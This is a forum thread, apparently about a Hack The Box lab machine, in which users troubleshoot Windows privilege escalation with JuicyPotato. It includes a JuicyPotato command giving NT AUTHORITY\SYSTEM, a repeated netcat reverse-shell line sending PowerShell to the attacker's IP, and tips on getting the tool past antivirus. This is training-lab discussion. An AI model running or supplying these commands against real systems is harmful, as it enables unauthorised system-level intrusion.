Starting Point: Shield, JuicyPotato and netcat

Hi All,

I was able to get a limited shell without using metasploit but couldn’t escalate privileges without looking at the walkthrough. I have a few questions.

  1. What are the clues that point to using JuicyPotato? I did enumeration but nothing jumped out at me. I searched for “windows server 2016 standard 10” with searchsploit, but the output did not contain anything about JuicyPotato (or RottenPotato).

  2. Is there a way to escalate privileges without using metasploit?

  3. How does juicyPotato work on a high level? I looked at a few online resources but I’m still confused.

Thanks

@theTCP said:

If it makes anyone feel better, I spent 6+ hours trying to figure out what I was doing wrong, feeling like a dumbass, and it happened to be that I was downloading an empty JuicyPotato.exe because my browser was blocking it. CHECK THE FILE SIZE!

Hahahaha, I’ve been like, what the heck man. But I did the same thing! Thanks for posting.

Can someone take a look at this and tell me where I’ve gone wrong? I’ve been glued to the computer for hours! lol

C:\inetpub\wwwroot\wordpress\wp-content\uploads>js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337

[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

That’s the last step, except I don’t get a shell on my listening port.

@R4ZZB33RY What port are you listening on?

@tasidonya 5555
That’s what’s in my .bat file as well.

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

@tasidonya said:

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

Yeah, that’s right. I’ll just check back on it.

Thanks

@R4ZZB33RY can you show us the contents of your shell.bat file? Everything else looks fine so I’d suspect something is wrong in that. Either that or you have something blocking the incoming connection on your end (firewall etc). Have you confirmed it works fine if you just run the shell.bat normally from the remote machine rather than trying to run it with js.exe as system?

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the “nc.exe -e powershell.exe” part after I ran the js.exe. It worked and connected but didn’t give me root.

@R4ZZB33RY said:

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the “nc.exe -e powershell.exe” part after I ran the js.exe. It worked and connected but didn’t give me root.

Your .bat file is not correct.

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the “nc.exe -e powershell.exe” part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command).

@VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the “nc.exe -e powershell.exe” part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command).

I ended up figuring it out. Thanks for the reply!

@R4ZZB33RY said:

@VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the “nc.exe -e powershell.exe” part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command).

I ended up figuring it out. Thanks for the reply!

Great :smiley:

Guys, I don’t get how to download JuicyPotato. If I go to the GitHub page and download it, there is no file called JuicyPotato.exe. Where is it??

Here you go: Releases · ohpe/juicy-potato · GitHub

@tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

Thank you, but when I download the .exe file, it’s empty??

@Jade86 said:

@tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

Thank you, but when I download the .exe file, it’s empty??

It gets flagged by your operating system. You have to open the file.

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

@tasidonya said:

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

OK, I’ll do that. Just to be absolutely sure, you just clicked on the file and it downloaded, yeah?

@Jade86 yes.